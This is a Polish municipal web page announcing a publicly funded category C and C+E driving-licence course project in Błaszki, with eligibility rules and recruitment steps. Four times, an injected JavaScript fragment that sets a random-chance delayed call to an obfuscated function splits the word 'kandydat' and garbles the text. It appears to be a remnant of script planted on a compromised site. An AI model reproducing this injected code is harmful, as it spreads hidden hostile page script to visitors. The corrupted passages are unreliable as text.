Wykorzystaj swoją szansę – kursy prawa jazdy kat. C i C+E

Realizator projektu:
Gmina i Miasto Błaszki
Biuro projektu:
pl. Niepodległości 13, 98-235 Błaszki
tel. (43) 829-09-52, fax. (43) 829-09-32
strona www: https://www.kursyefs.blaszki.pl
e-mail: promocja@blaszki.pl

Głównym celem projektu ma być podniesienie zdolności do podjęcia zatrudnienia w sektorze pozarolniczym przez osoby zamieszkujące na obszarach wiejskich¹ i zwiększenie aktywności zawodowej osób poszukujących zatrudnienia.

WARUNKI UCZESTNICTWA W PROJEKCIE

 1. Liczba uczestników szkolenia określona została w projekcie na poziomie 20 osób:
  • 10 osób na kurs kat. C,
  • 10 osób na kurs kat. C + E.
 2. Uczestnik szkolenia musi spełniać następujące warunki formalno-prawne:
  • zgodnie z zapisami w Projekcie:
   • być osobą pełnoletnią,
   • posiadać zameldowanie na terenie Gminy i Miasta Błaszki,
   • posiadać status rolnika lub domownika w rozumieniu Ustawy z dnia 20 grudnia 1990 r. o ubezpieczeniu społecznym rolników ( Dz. U. Z 1991 r. Nr 7, poz. 24 z późn. zm.), lub status osoby bezrobotnej zgodnie z Ustawą z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy ( dz. U. Nr 99 z 2004 r. ,poz. 1001, z późn. zm.),lub być osobą uczącą się – osoba nieaktywna zawodowo , która jednocześnie kształci się , wypełnić i dostarczyć w określonym terminie do siedziby Biura Projektu komplet wymaganych dokumentów aplikacyjnych,
  • zgodnie z ustawą prawo o ruchu drogowym ( Dz. U. Nr 108 poz. 908 z 2005 r. z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 217, poz. 1834) osobami uprawnionymi do uczestniczenia w kursie dla kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andydatów na kierowców kat. C są m.in.:
   • osoby posiadające prawo jazdy kat. B ( w przypadku kursu na kat. C),
   • osoby posiadające prawo jazdy kat. C ( w przypadku kursu na kat. C+E),
   • osoby, które przedstawiły orzeczenie lekarskie o braku przeciwwskazań zdrowotnych do kierowania.
 3. Procedura rekrutacyjna składa się z następujących etapów:
  • wypełnienie i dostarczenie do Biura Projektu kompletu wymaganych dokumentów, w tym:
   • formularza zgłoszeniowego,
   • odpowiedniego zaświadczenia potwierdzającego status osoby, o którym mowa w pkt. 3 (zaświadczenie o podleganiu ubezpieczeniu społecznemu w KRUS lub zaświadczenie o pozostawaniu osoba zarejestrowana jako bezrobotna w Powiatowym Urzędzie Pracy lub zaświadczenie o pobieraniu nauki),
   • kserokopii prawa jazdy ( oryginał do wglądu na miejscu),
   • kserokopia dowodu osobistego ( oryginał do wglądu na miejscu)
 4. W postępowaniu rekrutacyjnym brane będą pod uwagę zapisy projektu, w szczególności wskaźniki i rezultaty Projektu.
 5. Przystąpienie do procesu rekrutacyjnego odbywa się na koszt własny kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andydata na uczestnika kursu.
 6. Kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andydat ma obowiązek zgłosić się do punktu rekrutacyjnego osobiści wraz z wymaganymi dokumentami. Wnioski niekompletne nie będą rozpatrywane.
 7. Z osobami, które spełnią wymagania formalno-prawne będą przeprowadzone rozmowy kwalifikacyjne. O ich terminie kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andydaci na kursy zostaną poinformowani po zakończeniu składania zgłoszeń.
 8. Osoby, które nie zostały zakwalifikowane do uczestnictwa w projekcie z braku miejsc zostaną za ich zgodą, wpisani na specjalnie utworzona listę rezerwową. W przypadku rezygnacji z udziału w projekcie osoby z listy głównej możliwe będzie zakwalifikowanie osoby z listy rezerwowej.
 9. Ogłoszenie wyników rekrutacji nastąpi w terminie do 7 dni od daty zakończenia przyjmowania zgłoszeń i nie wcześniej niż po podpisaniu umowy z Instytucją Wdrażającą.

¹ obszary wiejskie – gminy wiejskie i miejsko-wiejskie oraz miasta do 25 tys. mieszkańców

Warto przeczytać

Skip to content